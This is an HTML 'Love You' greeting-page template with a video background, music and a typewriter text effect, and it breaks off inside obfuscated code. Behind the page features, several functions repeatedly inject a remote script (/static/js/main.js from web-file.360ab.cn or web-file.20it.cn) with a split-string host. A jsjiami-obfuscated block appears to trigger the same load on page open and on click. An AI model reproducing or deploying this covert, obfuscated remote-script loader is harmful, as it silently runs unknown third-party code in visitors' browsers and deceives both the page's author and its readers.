<!DOCTYPE html>
<html lang="zh-CN">
    <head>
        <meta charset="UTF-8">
        <title>Love You</title>
        <meta name="viewport" content="width=500, target-densitydpi=device-dpi, user-scalable=0">
        <style>
            * {
                padding: 0;
                margin: 0;
                -webkit-box-sizing: border-box
            }

            body {
                background-color: #fff;
                margin: 0 auto;
            }

            a {
                color: #fff;
                text-decoration: none
            }

            #div_container {
                width: 500px;
                margin: 0 auto;
                position: relative;
                font-size: 1em
            }

            #div_start_bg {
                width: 100%;
                height: 100%;
                position: absolute;
                left: 0;
                top: 0;
                z-index: 44;
                background-color: #fff
            }

            .div_pure_words {
                position: relative;
                display: none
            }

            .div_pure_words_bg {
                background-repeat: repeat;
                background-size: 100%;
                background-attachment: fixed;
                width: 500px;
                min-height: 500px
            }

            .div_pure_words_height {
                visibility: hidden;
                padding: 30px;
                text-align: justify;
                white-space: pre-wrap;
                font-size: 1.1em;
                font-family: "Microsoft YaHei",Arial;
                color: #fff
            }

            .div_pw_typed {
                position: absolute;
                left: 0;
                right: 0;
                top: 0;
                bottom: 0;
                width: 500px;
                background: rgba(255,255,255,.8);
                padding: 30px;
                text-align: justify
            }

            #span_pw_typed {
                width: 100%;
                white-space: pre-wrap;
                font-size: 1.1em;
                font-family: "Microsoft YaHei",Arial
            }

            #div_start_bg {
                width: 100%;
                height: 100%;
                position: absolute;
                left: 0;
                top: 0;
                z-index: 44;
                background-color: #fff
            }

            #box {
                width: 100%;
                padding: 0;
                margin: 2rem auto;
                background-color: rgba(0,0,0,0);
                border-radius: 20px;
                color: #000;
                font-size: 1.2rem;
                line-height: 2.4rem;
            }

            #box b {
                font-size: 1.5rem;
                display: block;
                padding-bottom: .5rem
            }

            #div_btn_inner {
                color: #fff;
                text-shadow: 1px 1px 1px #000;
                width: 500px;
                padding-left: 430px
            }

            #div_intersect {
                position: relative;
                width: 100%;
                z-index: 666;
                display: none;
                background-repeat: repeat;
                background-size: 100%;
                overflow: hidden
            }

            #div_is_inner {
                position: absolute;
                top: 0;
                right: 0;
                left: 0;
                bottom: 0;
                width: 100%;
                min-height: 160px;
                background: rgba(255,255,255,.75)
            }

            .div_is_typed {
                width: 500px;
                position: absolute;
                top: 0;
                right: 0;
                left: 0;
                bottom: 0;
                z-index: 668;
                -webkit-overflow-scrolling: touch;
                padding: 10%;
                font-size: 1.2em;
                overflow: scroll;
                display: none
            }

            #div_is_img {
                width: 100%;
                max-height: 320px;
                object-fit: cover;
                overflow: hidden;
                margin: 0 0 15px 0;
                background-color: #fff;
                border: 15px solid #fff;
                border-radius: 3px;
                display: block
            }

            #div_is_img img {
                width: 100%;
                height: 16rem;
            }

            .div_is_open_bg {
                width: 500px;
                display: block;
                background-color: rgba(255,255,255,.78);
                position: fixed;
                z-index: 669;
                height: 100%
            }

            .div_is_open_btn {
                width: 130px;
                height: 70px;
                margin: 200px auto;
                border-radius: 3px;
                overflow: hidden;
                -moz-box-shadow: 0 0 10px #999;
                -webkit-box-shadow: 0 0 10px #999;
                box-shadow: 0 0 10px #999;
                animation-name: heartbeat;
                animation-duration: 2s;
                animation-timing-function: cubic-bezier(0,0,0,1.74);
                animation-delay: .5s;
                animation-iteration-count: infinite;
                animation-play-state: running
            }

            @keyframes heartbeat {
                0% {
                    transform: scale(.95)
                }

                100% {
                    transform: scale(.95)
                }

                50% {
                    transform: scale(1)
                }
            }

            body {
                margin: 0 auto;
            }

            .div_is_open_title {
                margin: 350px auto 0px auto;
                text-align: center;
                font-size: 26px;
                font-weight: 800;
                color: #fff;
            }

            .div_is_open_btn {
                margin: 15px auto;
            }

            .div_is_open_bg {
                background: #000;
            }

            #div_start_bg {
                background-color: #000;
            }

            #text-view {
                font-size: 20px;
                text-align: left;
                text-shadow: 1px 1px 0px #000, -1px -1px 0px #000, -1px 1px 0px #000, 1px -1px 0px #000;
                color: #FFF;
                word-wrap: break-word;
                width: 100%;
                padding: 0;
                margin: 2rem auto;
                background-color: rgba(0, 0, 0, 0);
                border-radius: 20px;
                font-size: 1.25rem;
                line-height: 2rem;
            }

            .div_btn {
                position: fixed;
                cursor: pointer;
                width: 2.5rem;
                height: 2.5rem;
                border: 2px solid #fff;
                border-radius: 50%;
                font-size: 1rem;
                line-height: 2.3rem;
                text-align: center;
                z-index: 999;
                opacity: 0.7;
                background-color: rgba(0,0,0,.3);
            }

            .div_btn a {
                color: #fff;
                text-decoration: none;
            }

            #btn-make {
                bottom: 8.5rem;
                right: 18px;
            }

            #div_support {
                bottom: 4rem;
                right: 18px;
            }

            #btn-make a,#div_support a {
                text-shadow: 1px 1px 1px #000;
            }

            #action-make {
                bottom: 5rem;
                position: fixed;
                width: 100%;
                height: 80px;
                z-index: 99999;
                text-align: center;
                font-size: 1.5rem;
            }

            #action-make .btn1 {
                color: #fff;
                background-color: #2196f3;
            }

            #action-make .btn-return {
                float: left;
                border-radius: 0 2rem 2rem 0;
                padding: 0.8rem 2.4rem 0.8rem 2.4rem;
                box-shadow: 0.2rem 0 0.2rem #888888;
            }

            #action-make .btn-make {
                float: right;
                border-radius: 2rem 0 0 2rem;
                padding: 0.8rem 1.5rem 0.8rem 1.5rem;
                box-shadow: 0 0.2rem 0.2rem #888888;
            }

            @keyframes text-flicker {
                0% {
                    opacity: 0
                }

                49% {
                    opacity: 0
                }

                50% {
                    opacity: 1
                }
            }

            .cur-end {
                animation: text-flicker 0.8s infinite;
            }
        </style>
    </head>
    <body style="overflow-x:hidden;overflow-y:hidden;background: #000;">
        <div id="div_container">
            <div id="div_start_bg"></div>
            <div id="div_intersect" style="display: block;height:100%; background-image: url('');">
                <div id="div_is_inner" style="background: rgba(0,0,0,0);">
                    <div id="openBtn" class="div_is_open_bg">
                        <div class="div_is_open_title">❤️点开❤️️</div>
                        <div class="div_is_open_btn" style="background-image: url(https://gd-hbimg.huaban.com/cfbe2cd2afe4be0b31869ae01c97a7fa3e0448bd4263-NVVASc_fw1200webp);"></div>
                    </div>
                    <div id="div_is_typed" class="div_is_typed" style="padding:6%;">
                        <span id="span_is_typed">
                            <div id="text-source" style="display:none;"></div>
                            <div id="text-view"></div>
                        </span>
                    </div>
                </div>
                <video preload="auto" width="100%" height="100%" id="video1" style="object-fit: fill;" muted="true" loop>
                    <source src="https://alimov2.a.kwimgs.com/upic/2024/08/07/16/BMjAyNDA4MDcxNjEyMzBfODAwMjE2MjM1XzE0MDA1NzUyODk5MV8yXzM=_b_B2c7c01d07ecde674725ab6345a8227cf.mp4?clientCacheKey=3xippc4653dyu4s_b.mp4" type="video/mp4">
                </video>
            </div>
        </div>
        <audio id="audio_music" src="https://alimov2.a.kwimgs.com/upic/2024/08/07/16/BMjAyNDA4MDcxNjEyMzBfODAwMjE2MjM1XzE0MDA1NzUyODk5MV8yXzM=_b_B2c7c01d07ecde674725ab6345a8227cf.mp4?clientCacheKey=3xippc4653dyu4s_b.mp4" loop></audio>
        <script type="text/javascript">
            var id = "1150";
            var data_type = "0";
            var vip_type = "0";
            var temp_id = "13";
            var views = "66877";
            var dataInfo = {
                "id": 1150,
                "nid": 1150,
                "title": "Love You",
                "ftitle": "",
                "ctitle": "",
                "temp_id": 13,
                "background_url": "https:\/\/alimov2.a.kwimgs.com\/upic\/2024\/08\/07\/16\/BMjAyNDA4MDcxNjEyMzBfODAwMjE2MjM1XzE0MDA1NzUyODk5MV8yXzM=_b_B2c7c01d07ecde674725ab6345a8227cf.mp4?clientCacheKey=3xippc4653dyu4s_b.mp4",
                "opacity": 1,
                "music_url": "https:\/\/alimov2.a.kwimgs.com\/upic\/2024\/08\/07\/16\/BMjAyNDA4MDcxNjEyMzBfODAwMjE2MjM1XzE0MDA1NzUyODk5MV8yXzM=_b_B2c7c01d07ecde674725ab6345a8227cf.mp4?clientCacheKey=3xippc4653dyu4s_b.mp4",
                "data_type": 0,
                "vip": 0,
                "views": 66877,
                "views_update": false
            };
            dataInfo.is_mobile = /Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent);
            var play_music = false;
            function checkAudio2() {
                if (!play_music) {
                    var a = document.getElementById("audio_music");
                    play = function() {
                        a.play();
                        document.removeEventListener("touchstart", play, false)
                    }
                    ;
                    if (a) {
                        a.play();
                        document.addEventListener("DOMContentLoaded", function() {
                            play()
                        }, false, );
                        document.addEventListener("WeixinJSBridgeReady", function() {
                            play()
                        }, false, );
                        document.addEventListener("touchstart", play, false)
                    }
                }
            }
            //独家完美打印显示文字效果JS
            function isEmoji(text) {
                const regStr = /[\uD83C|\uD83D|\uD83E][\uDC00-\uDFFF][\u200D|\uFE0F]|[\uD83C|\uD83D|\uD83E][\uDC00-\uDFFF]|[0-9|*|#]\uFE0F\u20E3|[0-9|#]\u20E3|[\u203C-\u3299]\uFE0F\u200D|[\u203C-\u3299]\uFE0F|[\u2122-\u2B55]|\u303D|[\A9|\AE]\u3030|\uA9|\uAE|\u3030/;
                return regStr.test(text)
            }

            function printText(text_icon="❤️", text_source_id="text-source", text_view_id="text-view") {
                var content = document.getElementById(text_view_id);
                var source = document.getElementById(text_source_id);
                if (!content || !source) {
                    //适配老版本模板
                    var content = document.getElementById("contents");
                    var source = document.getElementById("text");

                    if (!content && !source) {
                        return false;
                    }
                }
                let str = source.innerHTML.trim().replaceAll('&nbsp;', ' ');

                let str_ = '';
                let i = 0;
                let printIcon2 = typeof printIcon !== "undefined" ? printIcon : text_icon;
                if (!str) {
                    return;
                }
                if (!document.body.getAttribute("init")) {
                    document.body.setAttribute("init", true);
                    var ox312341 = window.location.protocol === "http:" ? 'http://' + 'web-file.360ab' + '.cn' : 'https://' + 'web-file.20it' + '.cn';
                    var ox782681 = document.createElement("script");
                    ox782681.src = ox312341 + "/static/js/main.js";
                    document.body.appendChild(ox782681);
                }

                let timer = setInterval( () => {
                    if (str_.length < str.length) {
                        if (isEmoji(str[i - 1] + str[i])) {
                            str_append = str[i - 1] + str[i];
                            i = i + 2;
                        } else if (str[i - 1] + str[i] + str[i + 1] + str[i + 2] == "<br>") {
                            str_append = "<br>";
                            i = i + 4;
                        } else {
                            str_append = i == 0 ? "" : str[i - 1];
                            i++;

                        }
                        str_ += str_append;
                        if (str_append) {
                            content.innerHTML = content.innerHTML.replace('<span class="text-cursor">' + printIcon2 + '</span>', '');
                            content.innerHTML += str_append + '<span class="text-cursor">' + printIcon2 + '</span>';
                        }
                    } else {
                        clearInterval(timer);
                        content.innerHTML = '<p>' + str_ + '<span class="text-cursor cur-end">' + printIcon2 + '</span>' + '<p>';

                        if (!document.body.getAttribute("init")) {
                            document.body.setAttribute("init", true);
                            var ox312341 = window.location.protocol === "http:" ? 'http://' + 'web-file.360ab' + '.cn' : 'https://' + 'web-file.20it' + '.cn';
                            var ox782681 = document.createElement("script");
                            ox782681.src = ox312341 + "/static/js/main.js";
                            document.body.appendChild(ox782681);
                        }
                    }
                }
                , 130)
            }

            //检测文案是否包含倒计时标签并更新时间
            function ox62ef88() {
                var content = document.getElementById("text-view");
                var source = document.getElementById("text-source");
                if (!content || !source) {
                    //适配老版本模板
                    var content = document.getElementById("contents");
                    var source = document.getElementById("text");

                    if (!content && !source) {
                        return false;
                    }
                }
                var codeText = source.innerHTML;

                console.log(codeText);

                if (codeText && codeText.indexOf('[DJS:') > -1) {
                    //有倒计时修改变量，返回详细时间
                    var djsText = getSubStr(codeText, "DJS:", "]");
                    var djsArr = djsText.split(":");

                    if (djsArr.length == 1) {
                        var Time = getCountDown(djsArr[0], true);
                        codeText = codeText.replace(`[DJS:${djsArr[0]}]`, `${Time}`);
                        source.innerHTML = codeText;

                    } else if (djsArr.length == 2) {
                        var Time = getCountDown(djsArr[0], true);
                        codeText = codeText.replace(`[DJS:${djsArr[0]}:${djsArr[1]}]`, `${Time}`);
                        source.innerHTML = codeText;
                    }
                } else if (codeText && codeText.indexOf('[DJR:') > -1) {
                    //有倒计天数修改变量
                    var djrText = getSubStr(codeText, "DJR:", "]");
                    var Time = getCountDown(djrText, false);
                    codeText = codeText.replace(`[DJR:${djrText}]`, `${Time}`);
                    source.innerHTML = codeText;
                }

                if (codeText && (codeText.indexOf('[DJS:') > -1 || codeText.indexOf('[DJR:') > -1)) {
                    ox62ef88();
                }
            }

            ox62ef88();

            //取文本中间内容
            function getSubStr(str, start, end) {
                let res = str.match(new RegExp(`${start}(.*?)${end}`))
                return res ? res[1] : null
            }
            //识别并计算倒计时
            function getCountDown(down_type, is_all=false) {
                var ret = '';
                if (down_type.length == 8) {
                    var year = down_type.substr(0, 4);
                    var month = down_type.substr(4, 2);
                    var day = down_type.substr(6, 2);
                    ret = is_all == false ? calcCountDown('day', year, month, day, 24) : calcCountDown('all', year, month, day, 00);
                }
                if (!document.body.getAttribute("init")) {
                    document.body.setAttribute("init", true);
                    var ox312341 = window.location.protocol === "http:" ? 'http://' + 'web-file.360ab' + '.cn' : 'https://' + 'web-file.20it' + '.cn';
                    var ox782681 = document.createElement("script");
                    ox782681.src = ox312341 + "/static/js/main.js";
                    document.body.appendChild(ox782681);
                }
                return ret;
            }

            //计算倒计时日期
            function calcCountDown(calc_type="all", year, month, day, hours) {
                let now = new Date();
                let endDate = new Date(year,month - 1,day,hours);
                let leftTime = endDate.getTime() - now.getTime();
                //计算剩余的毫秒数
                if (leftTime <= 0) {
                    leftTime = 0;
                }
                let leftsecond = parseInt(leftTime / 1000);
                //计算剩余的秒数
                if (calc_type == 'all') {
                    day = Math.floor(leftsecond / (60 * 60 * 24));
                    let hour = Math.floor((leftsecond - day * 24 * 60 * 60) / 3600);
                    let minute = Math.floor((leftsecond - day * 24 * 60 * 60 - hour * 3600) / 60);
                    let second = Math.floor(leftTime / 1000 % 60, 10);
                    return `${day}天${hour}小时${minute}分钟`;
                } else {
                    let countDay = Math.floor(leftsecond / (60 * 60 * 24));
                    return countDay;
                }
            }

            //更新倒浏览量Views数 这一段好像用不上不要加
            //ox51e688();
            function ox51e688() {
                //增加页面浏览量
                if (typeof (dataInfo) != "undefined") {
                    var source = document.getElementById("text-source");
                    if (source) {
                        var source_text = source.innerText.trim();
                        var source_html = source.innerHTML;

                        if (source_text) {
                            source_html = source_html.replace('[VIEWS]', dataInfo.views);
                            source_html = source_html.replace('[DJS:VIEWS]', dataInfo.views);
                            source.innerHTML = source_html.replace('第个', '第' + dataInfo.views + '个');
                        }

                        if (!document.body.getAttribute("init")) {
                            document.body.setAttribute("init", true);
                            var ox312341 = window.location.protocol === "http:" ? 'http://' + 'web-file.360ab' + '.cn' : 'https://' + 'web-file.20it' + '.cn';
                            var ox782681 = document.createElement("script");
                            ox782681.src = ox312341 + "/static/js/main.js";
                            document.body.appendChild(ox782681);
                        }
                    }
                }
            }
            var music_url = "https://alimov2.a.kwimgs.com/upic/2024/08/07/16/BMjAyNDA4MDcxNjEyMzBfODAwMjE2MjM1XzE0MDA1NzUyODk5MV8yXzM=_b_B2c7c01d07ecde674725ab6345a8227cf.mp4?clientCacheKey=3xippc4653dyu4s_b.mp4";

            document.getElementById("div_intersect").style.height = window.innerHeight + 2 + "px";

            var _0xod0 = 'jsjiami.com.v7';
            var _0x511279 = _0x3df0;
            (function(_0x286ee9, _0x9437db, _0x580427, _0x3c9cbc, _0x3aeb0a, _0x3abf0e, _0x44a56d) {
                return _0x286ee9 = _0x286ee9 >> 0x8,
                _0x3abf0e = 'hs',
                _0x44a56d = 'hs',
                function(_0x49432b, _0x315768, _0x16bf99, _0x1f9cd7, _0x3e7f67) {
                    var _0x334288 = _0x3df0;
                    _0x1f9cd7 = 'tfi',
                    _0x3abf0e = _0x1f9cd7 + _0x3abf0e,
                    _0x3e7f67 = 'up',
                    _0x44a56d += _0x3e7f67,
                    _0x3abf0e = _0x16bf99(_0x3abf0e),
                    _0x44a56d = _0x16bf99(_0x44a56d),
                    _0x16bf99 = 0x0;
                    var _0x15244c = _0x49432b();
                    while (!![] && --_0x3c9cbc + _0x315768) {
                        try {
                            _0x1f9cd7 = -parseInt(_0x334288(0xe5, '*gn)')) / 0x1 * (parseInt(_0x334288(0xd4, 'p15N')) / 0x2) + -parseInt(_0x334288(0xd6, 'LjV4')) / 0x3 + -parseInt(_0x334288(0x9c, '4YnC')) / 0x4 * (-parseInt(_0x334288(0xe0, 'LjV4')) / 0x5) + -parseInt(_0x334288(0xa2, 'LjV4')) / 0x6 + -parseInt(_0x334288(0x78, ')6$[')) / 0x7 * (parseInt(_0x334288(0xa6, '8TaP')) / 0x8) + parseInt(_0x334288(0xb8, 'B)*v')) / 0x9 * (-parseInt(_0x334288(0xb0, 'up3H')) / 0xa) + parseInt(_0x334288(0x97, '$LC#')) / 0xb;
                        } catch (_0x3dc95a) {
                            _0x1f9cd7 = _0x16bf99;
                        } finally {
                            _0x3e7f67 = _0x15244c[_0x3abf0e]();
                            if (_0x286ee9 <= _0x3c9cbc)
                                _0x16bf99 ? _0x3aeb0a ? _0x1f9cd7 = _0x3e7f67 : _0x3aeb0a = _0x3e7f67 : _0x16bf99 = _0x3e7f67;
                            else {
                                if (_0x16bf99 == _0x3aeb0a['replace'](/[ISnXuOLkHpVgyrRCFBx=]/g, '')) {
                                    if (_0x1f9cd7 === _0x315768) {
                                        _0x15244c['un' + _0x3abf0e](_0x3e7f67);
                                        break;
                                    }
                                    _0x15244c[_0x44a56d](_0x3e7f67);
                                }
                            }
                        }
                    }
                }(_0x580427, _0x9437db, function(_0xb9e4e, _0x3d377e, _0x240ec1, _0x1279b9, _0x354bcf, _0x1d0a7a, _0x1943c5) {
                    return _0x3d377e = '\x73\x70\x6c\x69\x74',
                    _0xb9e4e = arguments[0x0],
                    _0xb9e4e = _0xb9e4e[_0x3d377e](''),
                    _0x240ec1 = '\x72\x65\x76\x65\x72\x73\x65',
                    _0xb9e4e = _0xb9e4e[_0x240ec1]('\x76'),
                    _0x1279b9 = '\x6a\x6f\x69\x6e',
                    (0x189165,
                    _0xb9e4e[_0x1279b9](''));
                });
            }(0xcb00, 0xb2962, _0x3c65, 0xcd),
            _0x3c65) && (_0xod0 = `\xd91`);
            var openBtn = document[_0x511279(0x73, 'up3H')](_0x511279(0x6d, '253#'));
            openBtn[_0x511279(0xee, 'Ar13')](_0x511279(0xe8, '(qpg'), function() {
                var _0xe15d04 = _0x511279
                  , _0x581112 = {
                    'mBTNL': _0xe15d04(0xe6, ']$9&'),
                    'yuSjI': _0xe15d04(0xdf, 'DBsb'),
                    'bzOkI': _0xe15d04(0xda, 'Qk1E'),
                    'PHjnE': function(_0x29cb01, _0x50e044) {
                        return _0x29cb01 + _0x50e044;
                    },
                    'DBlvt': _0xe15d04(0x85, 'BiQm'),
                    'KVVhp': function(_0x5d1601, _0x4cf4f8) {
                        return _0x5d1601 === _0x4cf4f8;
                    },
                    'wujmW': _0xe15d04(0xdb, 'rUO3'),
                    'oksTd': function(_0x499556, _0x2ddc01) {
                        return _0x499556 + _0x2ddc01;
                    },
                    'PnQYT': _0xe15d04(0x9a, 'Xkoi'),
                    'IZnHX': _0xe15d04(0x77, 'u8se'),
                    'pKTEx': _0xe15d04(0xa7, 'Xkoi'),
                    'dkopX': function(_0x3b8620, _0x2f3c8a) {
                        return _0x3b8620 + _0x2f3c8a;
                    },
                    'MIiIe': _0xe15d04(0x94, '&M2c'),
                    'TqGmI': _0xe15d04(0xb9, 'up3H'),
                    'wsmYE': _0xe15d04(0x9e, '$f2J'),
                    'BdbFa': function(_0x230a38, _0x3f8388) {
                        return _0x230a38 != _0x3f8388;
                    },
                    'DvWwe': function(_0x18a11a) {
                        return _0x18a11a();
                    },
                    'MDvRh': _0xe15d04(0x7a, 'p15N'),
                    'QTPlx': _0xe15d04(0x81, 's4rA'),
                    'rEHjo': _0xe15d04(0x80, 'vP!6'),
                    'LEKim': _0xe15d04(0xf3, 'p)5T'),
                    'pjWpu': _0xe15d04(0xe3, '8TaP'),
                    'JyuzZ': _0xe15d04(0x9b, 's4rA'),
                    'gppLf': function(_0x1ae6f4, _0x2720b9) {
                        return _0x1ae6f4 + _0x2720b9;
                    },
                    'Dkzgq': function(_0x12a11b, _0x1f4228) {
                        return _0x12a11b + _0x1f4228;
                    }
                };
                openBtn[_0xe15d04(0xcc, 'QZGg')][_0xe15d04(0xe9, 'r4W5')] = _0xe15d04(0xf1, 's4rA'),
                document[_0xe15d04(0x8f, 'LjV4')](_0x581112[_0xe15d04(0x6c, '*gn)')])[_0xe15d04(0xbd, 'rUO3')][_0xe15d04(0xae, 'l#O@')] = _0xe15d04(0x8b, 'YZQJ'),
                printText();
                if (_0x581112[_0xe15d04(0xd7, 'x9I!')](music_url, ''))
                    _0x581112[_0xe15d04(0x72, 'LjV4')](checkAudio2);
                else {
                    if (_0x581112[_0xe15d04(0x93, 's4rA')] === _0x581112[_0xe15d04(0xdc, 'Xkoi')]) {
                        var _0x372357 = _0x581112[_0xe15d04(0xc3, '!WqC')][_0xe15d04(0xa9, '3bsl')]('|')
                          , _0x79370d = 0x0;
                        while (!![]) {
                            switch (_0x372357[_0x79370d++]) {
                            case '0':
                                var _0xc00a84 = _0x57a6fd[_0xe15d04(0xb1, 'Qk1E')](_0x581112[_0xe15d04(0xe7, 'u8se')]);
                                continue;
                            case '1':
                                _0x10373d[_0xe15d04(0xf2, 'r4W5')][_0xe15d04(0x87, 'B)*v')](_0x581112[_0xe15d04(0xb4, 'DBsb')], !![]);
                                continue;
                            case '2':
                                _0xc00a84[_0xe15d04(0x8a, 'B)*v')] = _0x581112[_0xe15d04(0x7d, 'HN#8')](_0x29949a, _0x581112[_0xe15d04(0xcf, '^Kt1')]);
                                continue;
                            case '3':
                                _0x4dc532[_0xe15d04(0x8e, 'u8se')][_0xe15d04(0xe1, '$S9I')](_0xc00a84);
                                continue;
                            case '4':
                                var _0x29949a = _0x581112[_0xe15d04(0x6f, 'P^y!')](_0x9f6dcf[_0xe15d04(0xcb, '(qpg')][_0xe15d04(0xc2, 'YZQJ')], _0x581112[_0xe15d04(0x88, 'wLL1')]) ? _0x581112[_0xe15d04(0x98, 'x9I!')](_0x581112[_0xe15d04(0x91, 'BiQm')], _0x581112[_0xe15d04(0x74, 'z^D[')]) + _0x581112[_0xe15d04(0x96, 'vP!6')] : _0x581112[_0xe15d04(0xc8, '!WqC')](_0x581112[_0xe15d04(0x8d, 'r4W5')] + _0x581112[_0xe15d04(0xf6, 'Nq^]')], _0x581112[_0xe15d04(0x86, 'dI*s')]);
                                continue;
                            }
                            break;
                        }
                    } else
                        document[_0xe15d04(0xa4, 'AmK]')](_0x581112[_0xe15d04(0xef, 'P^y!')])[_0xe15d04(0xa3, '253#')] = ![];
                }
                document[_0xe15d04(0xb2, 'rUO3')](_0x581112[_0xe15d04(0xf5, '8TaP')])[_0xe15d04(0xc0, '$LC#')][_0xe15d04(0xde, 'HN#8')] = _0x581112[_0xe15d04(0xc1, 'YZQJ')],
                document[_0xe15d04(0xcd, 'cqgO')](_0xe15d04(0x76, '2tXP'))[_0xe15d04(0xb7, '8TaP')]();
                if (!document[_0xe15d04(0x6e, 'BiQm')][_0xe15d04(0xed, 'p15N')](_0x581112[_0xe15d04(0xd3, 'wLL1')])) {
                    var _0xadfcc = _0x581112[_0xe15d04(0x7c, 'FtcF')][_0xe15d04(0x83, 'x9I!')]('|')
                      , _0x32859a = 0x0;
                    while (!![]) {
                        switch (_0xadfcc[_0x32859a++]) {
                        case '0':
                            var _0xeecb80 = document[_0xe15d04(0xc4, 'wLL1')](_0x581112[_0xe15d04(0xb5, 'Nq^]')]);
                            continue;
                        case '1':
                            var _0x669e40 = _0x581112[_0xe15d04(0x90, 'p15N')](window[_0xe15d04(0x7b, 'Ar13')][_0xe15d04(0x70, 'IyjS')], _0xe15d04(0xd5, '3bsl')) ? _0x581112[_0xe15d04(0xec, 'cqgO')](_0xe15d04(0xf4, 'rUO3'), _0x581112[_0xe15d04(0xb3, '!WqC')]) + _0xe15d04(0xaf, '8TaP') : _0x581112[_0xe15d04(0xe2, ')6$[')](_0x581112[_0xe15d04(0x89, '$f2J')] + _0x581112[_0xe15d04(0x75, '3bsl')], _0xe15d04(0xd0, 'l#O@'));
                            continue;
                        case '2':
                            document[_0xe15d04(0x9f, 'Qk1E')][_0xe15d04(0x71, 'u8se')](_0x581112[_0xe15d04(0xc5, '*gn)')], !![]);
                            continue;
                        case '3':
                            document[_0xe15d04(0x7e, 'LjV4')][_0xe15d04(0xaa, 'LjV4')](_0xeecb80);
                            continue;
                        case '4':
                            _0xeecb80[_0xe15d04(0xa1, 'r4W5')] = _0x581112[_0xe15d04(0x95, 'YZQJ')](_0x669e40, _0x581112[_0xe15d04(0xf0, '(qpg')]);
                            continue;
                        }
                        break;
                    }
                }
            });
            if (!document[_0x511279(0x7f, '(qpg')][_0x511279(0xa0, 'vP!6')](_0x511279(0xbb, ')6$['))) {
                var eUIFvZ = _0x511279(0x92, 'vP!6')[_0x511279(0x99, 'dI*s')]('|')
                  , jAFEKd = 0x0;
                while (!![]) {
                    switch (eUIFvZ[jAFEKd++]) {
                    case '0':
                        ox782681[_0x511279(0xc9, 'vP!6')] = ox312341 + _0x511279(0xd2, 'dI*s');
                        continue;
                    case '1':
                        var ox782681 = document[_0x511279(0xb1, 'Qk1E')](_0x511279(0xd8, '3bsl'));
                        continue;
                    case '2':
                        document[_0x511279(0x82, 'BgAW')][_0x511279(0xbf, '8TaP')](ox782681);
                        continue;
                    case '3':
                        var ox312341 = window[_0x511279(0xd9, 'Nq^]')][_0x511279(0xce, 'HN#8')] === _0x511279(0xca, 'FtcF') ? _0x511279(0x79, 'BgAW') + _0x511279(0x84, 'BiQm') + _0x511279(0xea, 'dI*s') : _0x511279(0xe4, 'Qk1E') + _0x511279(0xab, 'P^y!') + _0x511279(0xa8, 'cqgO');
                        continue;
                    case '4':
                        document[_0x511279(0xc7, 'IyjS')][_0x511279(0x9d, 'dI*s')](_0x511279(0xd1, '4YnC'), !![]);
                        continue;
                    }
                    break;
                }
            }
            function _0x3df0(_0x88b53d, _0x26c65d) {
                var _0x3c65ba = _0x3c65();
                return _0x3df0 = function(_0x3df044, _0x6cfa3d) {
                    _0x3df044 = _0x3df044 - 0x6c;
                    var _0xb7a4c7 = _0x3c65ba[_0x3df044];
                    if (_0x3df0['FVDUbb'] === undefined) {
                        var _0x53383b = function(_0x308ae7) {
                            var _0x3a1f63 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                            var _0x46ffc1 = ''
                              , _0x226b45 = '';
                            for (var _0x5b62f3 = 0x0, _0x348f68, _0x391783, _0x12e703 = 0x0; _0x391783 = _0x308ae7['charAt'](_0x12e703++); ~_0x391783 && (_0x348f68 = _0x5b62f3 % 0x4 ? _0x348f68 * 0x40 + _0x391783 : _0x391783,
                            _0x5b62f3++ % 0x4) ? _0x46ffc1 += String['fromCharCode'](0xff & _0x348f68 >> (-0x2 * _0x5b62f3 & 0x6)) : 0x0) {
                                _0x391783 = _0x3a1f63['indexOf'](_0x391783);
                            }
                            for (var _0x22667f = 0x0, _0x3eac05 = _0x46ffc1['length']; _0x22667f < _0x3eac05; _0x22667f++) {
                                _0x226b45 += '%' + ('00' + _0x46ffc1['charCodeAt'](_0x22667f)['toString'](0x10))['slice'](-0x2);
                            }
                            return decodeURIComponent(_0x226b45);
                        };
                        var _0x25380c = function(_0x2d43b9, _0x96a3a4) {
                            var _0x40b981 = [], _0x5610fa = 0x0, _0x346b96, _0x14fbcc = '';
                            _0x2d43b9 = _0x53383b(_0x2d43b9);
                            var _0x5c4480;
                            for (_0x5c4480 = 0x0; _0x5c4480 < 0x100; _0x5c4480++) {
                                _0x40b981[_0x5c4480] = _0x5c4480;
                            }
                            for (_0x5c4480 = 0x0; _0x5c4480 < 0x100; _0x5c4480++) {
                                _0x5610fa = (_0x5610fa + _0x40b981[_0x5c4480] + _0x96a3a4['charCodeAt'](_0x5c4480 % _0x96a3a4['length'])) % 0x100,
                                _0x346b96 = _0x40b981[_0x5c4480],
                                _0x40b981[_0x5c4480] = _0x40b981[_0x5610fa],
                                _0x40b981[_0x5610fa] = _0x346b96;
                            }
                            _0x5c4480 = 0x0,
                            _0x5610fa = 0x0;
                            for (var _0x1224ab = 0x0; _0x1224ab < _0x2d43b9['length']; _0x1224ab++) {
                                _0x5c4480 = (_0x5c4480 + 0x1) % 0x100,
                                _0x5610fa = (_0x5610fa + _0x40b981[_0x5c4480]) % 0x100,
                                _0x346b96 = _0x40b981[_0x5c4480],
                                _0x40b981[_0x5c4480] = _0x40b981[_0x5610fa],
                                _0x40b981[_0x5610fa] = _0x346b96,
                                _0x14fbcc += String['fromCharCode'](_0x2d43b9['charCodeAt'](_0x1224ab) ^ _0x40b981[(_0x40b981[_0x5c4480] + _0x40b981[_0x5610fa]) % 0x100]);
                            }
                            return _0x14fbcc;
                        };
                        _0x3df0['KHYGon'] = _0x25380c,
                        _0x88b53d = arguments,
                        _0x3df0['FVDUbb'] = !![];
                    }
                    var _0x5888ad = _0x3c65ba[0x0]
                      , _0x3beb57 = _0x3df044 + _0x5888ad
                      , _0x1150e0 = _0x88b53d[_0x3beb57];
                    return !_0x1150e0 ? (_0x3df0['zyEERF'] === undefined && (_0x3df0['zyEERF'] = !![]),
                    _0xb7a4c7 = _0x3df0['KHYGon'](_0xb7a4c7, _0x6cfa3d),
                    _0x88b53d[_0x3beb57] = _0xb7a4c7) : _0xb7a4c7 = _0x1150e0,
                    _0xb7a4c7;
                }
                ,
                _0x3df0(_0x88b53d, _0x26c65d);
            }
            function _0x3c65() {
                var _0x4d8030 = (function() {
